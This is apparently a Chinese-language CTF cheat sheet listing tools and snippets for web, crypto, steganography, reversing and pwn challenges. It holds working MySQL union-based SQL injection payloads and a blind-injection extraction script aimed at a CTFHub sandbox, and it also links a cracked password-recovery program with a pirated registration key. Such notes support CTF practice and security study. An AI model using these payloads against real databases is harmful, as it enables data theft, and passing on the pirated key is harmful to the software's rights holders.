WEB
123313 union select 1,2# 123313 union select 1,database()# 123313 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"# 123313 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"# 123313 union select 1,flag from sqli.flag#普通手工注入
报错注入
import string import requests name = '' strall = string.ascii_lowercase + string.digits + string.punctuation # for k in range(1,15): for j in range(1,50): for i in strall: # 查数据库名 # datas = "if(substr(database(),%d,1)='%s',1,(select table_name from information_schema.tables))"% (j,i) # 查表名 # datas = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(k,j,i) # 查列名 # datas = "if(substr((select column_name from information_schema.columns where table_name='zqjsjpvifa' and table_schema='sqli'),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(j,i) # 查内容 # datas = "if(substr((select wdiqllcsoi from sqli.zqjsjpvifa),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(j,i) re = requests.get('http://challenge-0c37e62039a49553.sandbox.ctfhub.com:10080/?id='+datas) html = re.text # print(html) if "ctfhub" in html: name += i print(name) break布尔盲注
时间盲注
Fuzz字典 https://github.com/TheKingOfDuck/fuzzDicts
Git泄露
https://github.com/BugScanTeam/GitHack
https://github.com/WangWen-Albert/JGitHack
https://github.com/gakki429/Git_Extract
杂项
http://www.efittech.com/hxdec.html 识别汉信码
angr fuzz angr安装
1.安装依赖(基本开发环境): sudo apt-get install python-dev libffi-dev build-essential virtualenvwrapper 2.virtualenvwrapper初始化: 首先设置一个环境变量WORKON_HOME export WORKON_HOME=$HOME/Python-workhome 这里的$HOME/Python-workhome就是准备放置虚拟环境的地址 启动virtualenvwrapper.sh脚本 source /usr/share/virtualenvwrapper/virtualenvwrapper.sh 注意:可以使用whereis virtualenvwrapper.sh命令查看脚本的位置 3.在python3的环境下安装angr: mkvirtualenv --python=$(which python3) angr && pip install angr 4.安装好后在其他的命令在一个新的终端窗口直接运行workon,并没有创建的angr虚拟环境,需要执行下面两条命令才可以: export WORKON_HOME=$HOME/Python-workhome source /usr/share/virtualenvwrapper/virtualenvwrapper.sh 可以写一个shell脚本包含两条命令,以后直接运行shell脚本即可。 virtualenvwrapper操作命令: 创建环境 mkvirtualenv env1 环境创建之后,会自动进入该目录,并激活该环境。 切换或进入环境 workon env1 列出已有环境 workon 退出环境 deactivate 删除环境 rmvirtualenvangr安装
1 import angr p = angr.Project('martricks',auto_load_libs=False) state = p.factory.entry_state() simg = p.factory.simgr(state) simg.explore(find=0x400A84,avoid=0x400A90) simg.found[0].posix.dumps(0) 2 import angr p = angr.Project("martricks") simgr = p.factory.simulation_manager(p.factory.full_init_state()) simgr.explore(find=0x400A84, avoid=0x400A90) simgr.found[0].posix.dumps(0)fuzz代码
https://gchq.github.io/CyberChef/ 编码转换工具
DAPR 密码破解
dvanced archive password recovery pro v4.54破解版 下载:https://www.lanzous.com/i240fbc 输入注册码:ARCHPRP-GSVMT-66892-GKVMB-52992DAPR
代码段分析代码,明文使用了Rabin加密 m = "109930883401687215730636522935643539707" e = 2 n = 0x6FBD096744B2B34B423D70C8FB19B541 assert(int(m.encode('hex'), 16) < n) c = pow(int(m.encode('hex'), 16),e,n) print c #109930883401687215730636522935643539707 通过资料了解加密方式后,编写解密脚本,将n分解出p和q,解密脚本如下: import gmpy2 c=109930883401687215730636522935643539707 n=0x6fbd096744b2b34b423d70c8fb19b541 p=10848126018911527523 q=13691382465774455051 #获得c^(1/2)modp,q的解 r=pow(c,(p+1)/4,p) s=pow(c,(q+1)/4,q) #使用中国定理组合解 pni=int(gmpy2.invert(p,q)) qni=int(gmpy2.invert(q,p)) a=(s*p*pni+r*q*qni)%n a1=n-a b=(s*p*pni-r*q*qni)%n b1=n-b print (['0',''][len(hex(a))%2]+hex(a)[2:-1]).decode("hex") print (['0',''][len(hex(a))%2]+hex(a1)[2:-1]).decode("hex") print (['0',''][len(hex(a))%2]+hex(b)[2:-1]).decode("hex") print (['0',''][len(hex(a))%2]+hex(b1)[2:-1]).decode("hex")Rabin
JSFuck ()+[]!
wolfram 用于各类密码算法分析的在线工具
quipqiup 自动密码求解器
栅栏加密 https://www.qqxiuzi.cn/bianma/zhalanmima.php
CTF在线工具 http://ctf.ssleye.com/
隐写
binwalk -e 用于搜索给定二进制镜像文件以获取嵌入的文件和代码的工具
foremost 用来文件还原分离
Steghide 将文件隐藏到图片或音频中的工具
安装 apt-get install steghide 隐藏文件 steghide embed -cf [图片文件载体] -ef [待隐藏文件] steghide embed -cf 1.jpg -ef 1.txt 查看图片中嵌入的文件信息 steghide info 1.jpg 提取图片中隐藏的文件 steghide extract -sf 1.jpgsteghide
LSB-Steganography LSB隐写 https://github.com/RobinDavid/LSB-Steganography
Usage LSBSteg.py Usage: LSBSteg.py encode -i <input> -o <output> -f <file> LSBSteg.py decode -i <input> -o <output> Options: -h, --help Show this help --version Show the version -f,--file=<file> File to hide -i,--in=<input> Input image (carrier) -o,--out=<output> Output image (or extracted file)LSB-Steganography
stegsolve 图片隐写查看器 http://www.caesum.com/handbook/Stegsolve.jar
snow html隐写 http://fog.misty.com/perry/ccs/snow/snow/snow.html
snow 是一款在html嵌入隐写信息的软件, 它的原理是通过在文本文件的末尾嵌入空格和制表位的方式嵌入隐藏信息, 不同空格与制表位的组合代表不同的嵌入信息。snow
ezgif GIF 在线分帧工具
Audacity 一款免费的音频处理软件,常用于音频隐写
MP3Stego 音频隐写工具
逆向
IDA Pro 一款功能丰富的跨平台多处理器反汇编程序和调试器
OD
Ghidra
jadx-gui Android/Java反编译
JEB Android逆向工具,可以反编译和调试二进制代码
jd-gui 将 class 文件反编译为 Java 源代码
Apktool 主要用于逆向 apk 文件。它可以将资源解码,并在修改后可以重新构建它们。
dnSpy 一款.NET程序调试器和反编译器
PWN
pwntools PWN工具集 pip install pwntools
checksec 检查保护机制 apt-get install checksec
ROPgadget
LibcSearcher 泄露libc版本
安装 git clone https://github.com/lieanu/LibcSearcher.git cd LibcSearcher python setup.py developLibcSearcher
gdb linux程序动态调试 apt-get install gdb
gdb-peda
git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbinitgdb-peda安装
objdump 快速查看二进制文件信息的工具